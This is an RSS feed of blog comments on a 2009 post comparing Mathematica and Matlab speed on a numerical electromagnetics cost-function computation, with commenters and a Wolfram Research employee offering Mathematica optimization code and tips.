<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Mathematica, 2.5 hours.  Matlab, 47 seconds.  Not impressed, WRI, not impressed.</title>
	<atom:link href="http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/feed/" rel="self" type="application/rss+xml" />
	<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/</link>
	<description>Threads both sad and humoristic / the careless fruit of my amusements ...</description>
	<lastBuildDate>Mon, 17 Sep 2012 08:06:41 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Greg Klopper</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-263</link>
		<dc:creator>Greg Klopper</dc:creator>
		<pubDate>Fri, 07 Jan 2011 18:38:09 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-263</guid>
		<description>ALWAYS compile numeric functions. The performance boost is phenomenal to say the least. I&#039;m not even talking about C compiling in version 8, just using the built-in Compile function to get away from symbolic/interpreted code. Also, give numeric attribute to your numeric functions. That way the interpreter knows that given a set of numbers, the result will never be symbolic, but also a number.

But comparing a true symbolic calculation engine against a purely numeric one is rather unfair. You can add extra effort to ask Mathematica to treat your input as purely numeric (like NIntegrate), but good luck getting Matlab to do some of the fascinating things that Mathematica can do out of the box (even if they take a bit of time, because a symbol&#039;s representation and checking its various values under various conditions takes longer).</description>
		<content:encoded><![CDATA[<p>ALWAYS compile numeric functions. The performance boost is phenomenal to say the least. I'm not even talking about C compiling in version 8, just using the built-in Compile function to get away from symbolic/interpreted code. Also, give numeric attribute to your numeric functions. That way the interpreter knows that given a set of numbers, the result will never be symbolic, but also a number.</p>
<p>But comparing a true symbolic calculation engine against a purely numeric one is rather unfair. You can add extra effort to ask Mathematica to treat your input as purely numeric (like NIntegrate), but good luck getting Matlab to do some of the fascinating things that Mathematica can do out of the box (even if they take a bit of time, because a symbol's representation and checking its various values under various conditions takes longer).</p>
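<p>A minimal sketch of the two suggestions above (the built-in Compile function, and the NumericFunction attribute); the function name f is purely illustrative:</p>

```mathematica
(* Compile a numeric kernel so it runs on machine numbers
   instead of going through the symbolic evaluator *)
cf = Compile[{{x, _Real}}, Sin[x]^2 + Cos[x]^2];
cf[0.5]

(* Declare an illustrative function numeric, so the evaluator
   knows that numeric arguments always produce a numeric result *)
f[x_?NumericQ] := Sin[x] Exp[-x^2];
SetAttributes[f, NumericFunction];
```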
]]></content:encoded>
	</item>
	<item>
		<title>By: green tea</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-34</link>
		<dc:creator>green tea</dc:creator>
		<pubDate>Sat, 08 Aug 2009 18:57:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-34</guid>
		<description>I found a solution to remove the bottleneck.

SetSystemOptions[&quot;CatchMachineUnderflow&quot; -&gt; False];

prepend this to my previous code.</description>
		<content:encoded><![CDATA[<p>I found a solution to remove the bottleneck.</p>
<p>SetSystemOptions["CatchMachineUnderflow" -&gt; False];</p>
<p>prepend this to my previous code.</p>
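<p>For context, a sketch of setting and restoring that system option (the option name is as given above and applies to the Mathematica versions discussed in this thread):</p>

```mathematica
(* Save the current setting, disable underflow catching,
   run the numeric code, then restore the old setting *)
old = SystemOptions["CatchMachineUnderflow"];
SetSystemOptions["CatchMachineUnderflow" -> False];
(* ... numeric computation goes here ... *)
SetSystemOptions[old];
```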
]]></content:encoded>
	</item>
	<item>
		<title>By: green tea</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-32</link>
		<dc:creator>green tea</dc:creator>
		<pubDate>Sat, 08 Aug 2009 07:38:29 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-32</guid>
		<description>what about this code?

I translated MATLAB code to Mathematica code directly.

A bottleneck is in MagneticSlabTransmission.

If xLim=54, underflow occurs in MagneticSlabTransmission,

and Mathematica will use arbitrary precision arithmetic, not FPU.



trapz[x_, y_] := (x[[2 ;;]] - x[[;; -2]]).(y[[2 ;;]] + y[[;; -2]])/2;

fftshift[x_] := RotateRight[x, Quotient[Length[x], 2]];

PerformDft1[fh_, xLim_, smpRateX_] :=
 Module[{step, Nw, kLim, kstep, xvec, kvec, data, dataTransform},
  step = smpRateX^-1;
  Nw = 2*xLim*smpRateX;
  kLim = smpRateX;
  kstep = (2*xLim)^-1;
  xvec = Range[-xLim, xLim - step, step];
  kvec = Range[-kLim/2, kLim/2 - kstep, kstep];
  data = fftshift[fh[xvec]];
  dataTransform = step*Fourier[data, FourierParameters -&gt; {1, -1}];
  {dataTransform, kvec}
  ];

TESlabTransmissionNice[kx_, mu11_, d_] := 
 Module[{eps, m0, epar, mperp, mu1, kz0, kz1, kz2},
  eps = $MachineEpsilon;
  m0 = 1. + eps*I;
  epar = 1. + eps*I;
  mperp = 1.;
  mu1 = mu11 + eps*I;
  kz0 = Sqrt[m0 - kx^2];
  kz1 = Sqrt[mu1*(epar - kx^2/mperp)];
  kz2 = kz1*m0/(kz0*mu1);
  (Cos[d*kz1] - (kz2 + kz2^(-1))*Sin[d*kz1]*I/2)^(-1)
  ];

MagneticSlabTransmission[kx_, mu1_, d_] :=
 With[{h = 0.5},
  Exp[-4*Pi*h*Sqrt[kx^2 - 1 + 0.*I]]*
   TESlabTransmissionNice[kx, mu1, 2*Pi*d](* 
  unpacking occurs . bottleneck *)
  ];

CostFunctionIntegrand[fh_] :=
 Module[{xLim, xSmpRate, dftStruct, absxform},
  xLim = 100.;
  xSmpRate = 100.;
  dftStruct = PerformDft1[fh, xLim, xSmpRate];
  absxform = Abs[fftshift[dftStruct[[1]]]];
  {dftStruct[[2]], absxform/Max[absxform]}
  ];

Timing[
 outfile = OpenWrite[&quot;costfn1.dat&quot;];
 Do[
  Write[outfile, {d, mpp, 
    trapz @@ 
     CostFunctionIntegrand[MagneticSlabTransmission[#, mpp, d] &amp;]}],
  {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}];
 Close[outfile];
 ]</description>
		<content:encoded><![CDATA[<p>what about this code?</p>
<p>I translated MATLAB code to Mathematica code directly.</p>
<p>A bottleneck is in MagneticSlabTransmission.</p>
<p>If xLim=54, underflow occurs in MagneticSlabTransmission,</p>
<p>and Mathematica will use arbitrary precision arithmetic, not FPU.</p>
<p>trapz[x_, y_] := (x[[2 ;;]] - x[[;; -2]]).(y[[2 ;;]] + y[[;; -2]])/2;</p>
<p>fftshift[x_] := RotateRight[x, Quotient[Length[x], 2]];</p>
<p>PerformDft1[fh_, xLim_, smpRateX_] :=<br />
 Module[{step, Nw, kLim, kstep, xvec, kvec, data, dataTransform},<br />
  step = smpRateX^-1;<br />
  Nw = 2*xLim*smpRateX;<br />
  kLim = smpRateX;<br />
  kstep = (2*xLim)^-1;<br />
  xvec = Range[-xLim, xLim - step, step];<br />
  kvec = Range[-kLim/2, kLim/2 - kstep, kstep];<br />
  data = fftshift[fh[xvec]];<br />
  dataTransform = step*Fourier[data, FourierParameters -&gt; {1, -1}];<br />
  {dataTransform, kvec}<br />
  ];</p>
<p>TESlabTransmissionNice[kx_, mu11_, d_] :=<br />
 Module[{eps, m0, epar, mperp, mu1, kz0, kz1, kz2},<br />
  eps = $MachineEpsilon;<br />
  m0 = 1. + eps*I;<br />
  epar = 1. + eps*I;<br />
  mperp = 1.;<br />
  mu1 = mu11 + eps*I;<br />
  kz0 = Sqrt[m0 - kx^2];<br />
  kz1 = Sqrt[mu1*(epar - kx^2/mperp)];<br />
  kz2 = kz1*m0/(kz0*mu1);<br />
  (Cos[d*kz1] - (kz2 + kz2^(-1))*Sin[d*kz1]*I/2)^(-1)<br />
  ];</p>
<p>MagneticSlabTransmission[kx_, mu1_, d_] :=<br />
 With[{h = 0.5},<br />
  Exp[-4*Pi*h*Sqrt[kx^2 - 1 + 0.*I]]*<br />
   TESlabTransmissionNice[kx, mu1, 2*Pi*d](*<br />
  unpacking occurs . bottleneck *)<br />
  ];</p>
<p>CostFunctionIntegrand[fh_] :=<br />
 Module[{xLim, xSmpRate, dftStruct, absxform},<br />
  xLim = 100.;<br />
  xSmpRate = 100.;<br />
  dftStruct = PerformDft1[fh, xLim, xSmpRate];<br />
  absxform = Abs[fftshift[dftStruct[[1]]]];<br />
  {dftStruct[[2]], absxform/Max[absxform]}<br />
  ];</p>
<p>Timing[<br />
 outfile = OpenWrite["costfn1.dat"];<br />
 Do[<br />
  Write[outfile, {d, mpp,<br />
    trapz @@<br />
     CostFunctionIntegrand[MagneticSlabTransmission[#, mpp, d] &amp;]}],<br />
  {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}];<br />
 Close[outfile];<br />
 ]</p>
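<p>The underflow behavior described above can be seen in isolation; a machine-precision result that underflows is silently promoted to an arbitrary-precision number (behavior as of the version-7-era kernels discussed here):</p>

```mathematica
(* Exp[-1000.] is far below the machine-number underflow
   threshold (~2.2*10^-308), so the kernel leaves the FPU *)
small = Exp[-1000.];
MachineNumberQ[small]  (* False where underflow is caught:
                          the result is arbitrary-precision *)
Precision[small]
```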
]]></content:encoded>
	</item>
	<item>
		<title>By: attempt_to_blog++ : The nice thing about Wolfram Research is&#8230;</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-9</link>
		<dc:creator>attempt_to_blog++ : The nice thing about Wolfram Research is&#8230;</dc:creator>
		<pubDate>Wed, 08 Jul 2009 09:21:40 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-9</guid>
		<description>[...] that the product of his life&#8217;s work, basically, blows, the good folks at Wolfram actually went and optimized my code, making it run an order of magnitude faster (although still an order of magnitude slower than [...]</description>
		<content:encoded><![CDATA[<p>[...] that the product of his life&#8217;s work, basically, blows, the good folks at Wolfram actually went and optimized my code, making it run an order of magnitude faster (although still an order of magnitude slower than [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: dnquark</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-7</link>
		<dc:creator>dnquark</dc:creator>
		<pubDate>Tue, 07 Jul 2009 00:24:38 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-7</guid>
		<description>My timing, on Solaris 1.5 GHz server, same version of Mathematica:
posted code, 8 mins 7 seconds;
replace Integrate with NIntegrate: 5m35s

Matlab?  48 seconds.  still.  
Now, I have to disqualify the NIntegrate results, because for several values of parameters, they seem to be numerically different from the Integrate[] or from matlab&#039;s trapz by about 5%.  (Matlab agrees with the Integrate[] approach to within 0.0003%)</description>
		<content:encoded><![CDATA[<p>My timing, on Solaris 1.5 GHz server, same version of Mathematica:<br />
posted code, 8 mins 7 seconds;<br />
replace Integrate with NIntegrate: 5m35s</p>
<p>Matlab?  48 seconds.  still.<br />
Now, I have to disqualify the NIntegrate results, because for several values of parameters, they seem to be numerically different from the Integrate[] or from matlab's trapz by about 5%.  (Matlab agrees with the Integrate[] approach to within 0.0003%)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Daniel Lichtblau</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-6</link>
		<dc:creator>Daniel Lichtblau</dc:creator>
		<pubDate>Mon, 06 Jul 2009 23:22:16 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-6</guid>
		<description>The bottlenecks are:

(1) Use of exact inputs that will slow some functions (trigs, Sqrt[], and so on).

(2) Repeated computation of a function that is mapped over a list. Much faster to have the function take a list argument and compute a list result. This is in part because we can now work with the vector as a packed array, and do not need to break it up element-by-element.

Here is the faster code. It runs in about 80 seconds on my machine.
&lt;code&gt;
FftShift1D[x_] := Module[{n = Ceiling[Length[x]/2]},
  RotateRight[x, n]]

PerformDft1[func_, xLim_, smpRateX_] :=
 Module[{kLim = smpRateX, step = 1/smpRateX,
   kstep = 1/(2*xLim), data, dataTransform, xvec, kvec},
  xvec = Range[-xLim, xLim - step, step];
  kvec = Range[-kLim/2, kLim/2 - kstep, kstep];
  data = FftShift1D[func[N[xvec]]];
  dataTransform = Fourier[data, FourierParameters -&gt; {1, -1}]/smpRateX;
  {dataTransform, kvec, 1/kstep}]

TESlabTransmissionNice[kx_, mu11_, d_] :=
 Module[{m0, mu1, kz0, kz1, epar, mperp = 1., eps = 10.^(-20)},
  m0 = 1. + I*eps;
  mu1 = mu11 + I*eps;
  epar = 1. + I*eps;
  kz0 = Sqrt[m0 - kx^2];
  kz1 = Sqrt[mu1*(epar - kx^2/mperp)];
  1/(Cos[d*kz1] -
     I/2.*((mu1*kz0)/(m0*kz1) + (m0*kz1)/(mu1*kz0))*Sin[d*kz1])]

MagneticSlabTransmission[kx_, mupp_, d_] :=
  Module[{mu1 = -1. + I*mupp, h = 0.5},
   Exp[-4*Pi*h*Sqrt[kx^2 - 1.]]*
    TESlabTransmissionNice[kx, mu1, 2.*Pi*d]];

CostFunctionIntegrand[fn_, print_: False] :=
 Module[{xLim = 100, xSmpRate = 100, xform, kvec,
   srk}, {xform, kvec, srk} = PerformDft1[fn, N[xLim], N[xSmpRate]];
  xform = FftShift1D@xform;
  If[print,
   Print[ListPlot[Re[Transpose[{kvec, xform}]],
     PlotRange -&gt; {{-1, 1}, All}]];
   Print[&quot;k sampling rate: &quot;, srk];];
  Transpose[{N[kvec], Abs[xform]/Max[Abs[xform]]}]]

ComputeCostFunction[fn_] :=
 Module[{integrand, min, max}, integrand = CostFunctionIntegrand[fn];
  min = Min[integrand[[All, 1]]];
  max = Max[integrand[[All, 1]]];
  Integrate[Interpolation[integrand,InterpolationOrder-&gt;2][x],{x,
  min,max}]
  ]

ComputeCostAndOutput[d_, mpp_, fname_] :=
  PutAppend[{d, mpp,
    ComputeCostFunction[MagneticSlabTransmission[#, mpp, d] &amp;]},
   fname];

Timing[Map[((ComputeCostAndOutput[#1, #2,
         &quot;/tmp/costfn1.dat&quot;] &amp;) @@ #) &amp;,
   Table[{d, mpp}, {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}], {2}];]

We can furthermore replace Integrate[...] by

NIntegrate[
   Interpolation[integrand, InterpolationOrder -&gt; 2][x], {x, min,
    max}, PrecisionGoal -&gt; 2, AccuracyGoal -&gt; 2, MaxRecursion -&gt; 6,
   MaxPoints -&gt; Ceiling[Length[integrand[[All, 1]]]]/2,
   Method -&gt; {&quot;Trapezoidal&quot;, &quot;SymbolicProcessing&quot; -&gt; None}]

This variant runs in under a minute on my machine (3 Ghz, Linux, version 7.0.1 Mathematica).

In[8]:= Timing[
 Map[((ComputeCostAndOutput[#1, #2, &quot;/tmp/costfn1.dat&quot;] &amp;) @@ #) &amp;,
   Table[{d, mpp}, {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}], {2}];]

Out[8]= {50.1584, Null}&lt;/code&gt;

Locating the bottlenecks was in part knowing to look for (1) above, coupled with use of Print[] statements to isolate (2).

Daniel Lichtblau
Wolfram Research</description>
		<content:encoded><![CDATA[<p>The bottlenecks are:</p>
<p>(1) Use of exact inputs that will slow some functions (trigs, Sqrt[], and so on).</p>
<p>(2) Repeated computation of a function that is mapped over a list. Much faster to have the function take a list argument and compute a list result. This is in part because we can now work with the vector as a packed array, and do not need to break it up element-by-element.</p>
<p>Here is the faster code. It runs in about 80 seconds on my machine.<br />
<code><br />
FftShift1D[x_] := Module[{n = Ceiling[Length[x]/2]},<br />
  RotateRight[x, n]]</p>
<p>PerformDft1[func_, xLim_, smpRateX_] :=<br />
 Module[{kLim = smpRateX, step = 1/smpRateX,<br />
   kstep = 1/(2*xLim), data, dataTransform, xvec, kvec},<br />
  xvec = Range[-xLim, xLim - step, step];<br />
  kvec = Range[-kLim/2, kLim/2 - kstep, kstep];<br />
  data = FftShift1D[func[N[xvec]]];<br />
  dataTransform = Fourier[data, FourierParameters -&gt; {1, -1}]/smpRateX;<br />
  {dataTransform, kvec, 1/kstep}]</p>
<p>TESlabTransmissionNice[kx_, mu11_, d_] :=<br />
 Module[{m0, mu1, kz0, kz1, epar, mperp = 1., eps = 10.^(-20)},<br />
  m0 = 1. + I*eps;<br />
  mu1 = mu11 + I*eps;<br />
  epar = 1. + I*eps;<br />
  kz0 = Sqrt[m0 - kx^2];<br />
  kz1 = Sqrt[mu1*(epar - kx^2/mperp)];<br />
  1/(Cos[d*kz1] -<br />
     I/2.*((mu1*kz0)/(m0*kz1) + (m0*kz1)/(mu1*kz0))*Sin[d*kz1])]</p>
<p>MagneticSlabTransmission[kx_, mupp_, d_] :=<br />
  Module[{mu1 = -1. + I*mupp, h = 0.5},<br />
   Exp[-4*Pi*h*Sqrt[kx^2 - 1.]]*<br />
    TESlabTransmissionNice[kx, mu1, 2.*Pi*d]];</p>
<p>CostFunctionIntegrand[fn_, print_: False] :=<br />
 Module[{xLim = 100, xSmpRate = 100, xform, kvec,<br />
   srk}, {xform, kvec, srk} = PerformDft1[fn, N[xLim], N[xSmpRate]];<br />
  xform = FftShift1D@xform;<br />
  If[print,<br />
   Print[ListPlot[Re[Transpose[{kvec, xform}]],<br />
     PlotRange -&gt; {{-1, 1}, All}]];<br />
   Print["k sampling rate: ", srk];];<br />
  Transpose[{N[kvec], Abs[xform]/Max[Abs[xform]]}]]</p>
<p>ComputeCostFunction[fn_] :=<br />
 Module[{integrand, min, max}, integrand = CostFunctionIntegrand[fn];<br />
  min = Min[integrand[[All, 1]]];<br />
  max = Max[integrand[[All, 1]]];<br />
  Integrate[Interpolation[integrand,InterpolationOrder-&gt;2][x],{x,<br />
  min,max}]<br />
  ]</p>
<p>ComputeCostAndOutput[d_, mpp_, fname_] :=<br />
  PutAppend[{d, mpp,<br />
    ComputeCostFunction[MagneticSlabTransmission[#, mpp, d] &amp;]},<br />
   fname];</p>
<p>Timing[Map[((ComputeCostAndOutput[#1, #2,<br />
         "/tmp/costfn1.dat"] &amp;) @@ #) &amp;,<br />
   Table[{d, mpp}, {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}], {2}];]</p>
<p>We can furthermore replace Integrate[...] by</p>
<p>NIntegrate[<br />
   Interpolation[integrand, InterpolationOrder -&gt; 2][x], {x, min,<br />
    max}, PrecisionGoal -&gt; 2, AccuracyGoal -&gt; 2, MaxRecursion -&gt; 6,<br />
   MaxPoints -&gt; Ceiling[Length[integrand[[All, 1]]]]/2,<br />
   Method -&gt; {"Trapezoidal", "SymbolicProcessing" -&gt; None}]</p>
<p>This variant runs in under a minute on my machine (3 Ghz, Linux, version 7.0.1 Mathematica).</p>
<p>In[8]:= Timing[<br />
 Map[((ComputeCostAndOutput[#1, #2, "/tmp/costfn1.dat"] &amp;) @@ #) &amp;,<br />
   Table[{d, mpp}, {d, 0.05, 1, 0.05}, {mpp, 0.05, 1, 0.05}], {2}];]</p>
<p>Out[8]= {50.1584, Null}</code></p>
<p>Locating the bottlenecks was in part knowing to look for (1) above, coupled with use of Print[] statements to isolate (2).</p>
<p>Daniel Lichtblau<br />
Wolfram Research</p>
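<p>The two bottlenecks above can be sketched in isolation; the vector length here is illustrative:</p>

```mathematica
(* (2) Packed arrays: a Range of machine reals is packed, and
   listable numeric operations keep it packed; element-by-element
   evaluation of a symbolic function breaks the packing *)
v = Range[-100., 100., 0.01];
Developer`PackedArrayQ[v]        (* True *)
Developer`PackedArrayQ[Sin[v]]   (* True: stays packed *)

(* (1) Exact inputs force symbolic evaluation;
   machine reals evaluate immediately *)
Sqrt[2]   (* stays symbolic *)
Sqrt[2.]  (* machine-precision number *)
```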
]]></content:encoded>
	</item>
	<item>
		<title>By: dnquark</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-5</link>
		<dc:creator>dnquark</dc:creator>
		<pubDate>Mon, 06 Jul 2009 21:35:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-5</guid>
		<description>Interesting.   I figured there&#039;d be room for some optimization, and I&#039;m really glad somebody looked into it.  Doesn&#039;t make me feel much better about Mathematica, though.  If I don&#039;t use Modules[] when developing code, my namespace is littered with globals, which eventually blows up in my face.  And wrapping every possible numeric constant in N[] (or using decimals) gets tiring after a while.</description>
		<content:encoded><![CDATA[<p>Interesting.   I figured there'd be room for some optimization, and I'm really glad somebody looked into it.  Doesn't make me feel much better about Mathematica, though.  If I don't use Modules[] when developing code, my namespace is littered with globals, which eventually blows up in my face.  And wrapping every possible numeric constant in N[] (or using decimals) gets tiring after a while.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: JonyEpsilon</title>
		<link>http://dnquark.com/blog/2009/07/mathematica-2-5-hours-matlab-47-seconds-not-impressed-wri-not-impressed/comment-page-1/#comment-3</link>
		<dc:creator>JonyEpsilon</dc:creator>
		<pubDate>Mon, 06 Jul 2009 11:54:59 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=29#comment-3</guid>
		<description>FWIW, I had a crack at speeding up the Mathematica code. You can more than double the speed by adding periods to the numeric constants, which forces Mathematica into doing approximate rather than exact numerics. You can get about another factor of two by replacing the core functions in the integrand with pure functions and removing the modules. (Mathematica is almost always fastest with pure functions as it then doesn&#039;t have to invoke the pattern matcher on the arguments. Modules involve some significant symbolic name-mangling and are pretty slow.)

It&#039;s still nowhere near 47 seconds, but I thought you might be interested anyway!


Jony</description>
		<content:encoded><![CDATA[<p>FWIW, I had a crack at speeding up the Mathematica code. You can more than double the speed by adding periods to the numeric constants, which forces Mathematica into doing approximate rather than exact numerics. You can get about another factor of two by replacing the core functions in the integrand with pure functions and removing the modules. (Mathematica is almost always fastest with pure functions as it then doesn't have to invoke the pattern matcher on the arguments. Modules involve some significant symbolic name-mangling and are pretty slow.)</p>
<p>It's still nowhere near 47 seconds, but I thought you might be interested anyway!</p>
<p>Jony</p>
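<p>A minimal sketch of the pure-function point above; the definitions and timing loop are illustrative, and the actual speedup will vary by machine and version:</p>

```mathematica
(* A Module-based definition versus an equivalent pure function:
   the pure function skips pattern matching and Module's scoping *)
fModule[x_] := Module[{a = 2.}, a*Sin[x]];
fPure = 2.*Sin[#] &;

AbsoluteTiming[fModule /@ Range[0., 10., 0.001];]
AbsoluteTiming[fPure /@ Range[0., 10., 0.001];]
```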
]]></content:encoded>
	</item>
</channel>
</rss>
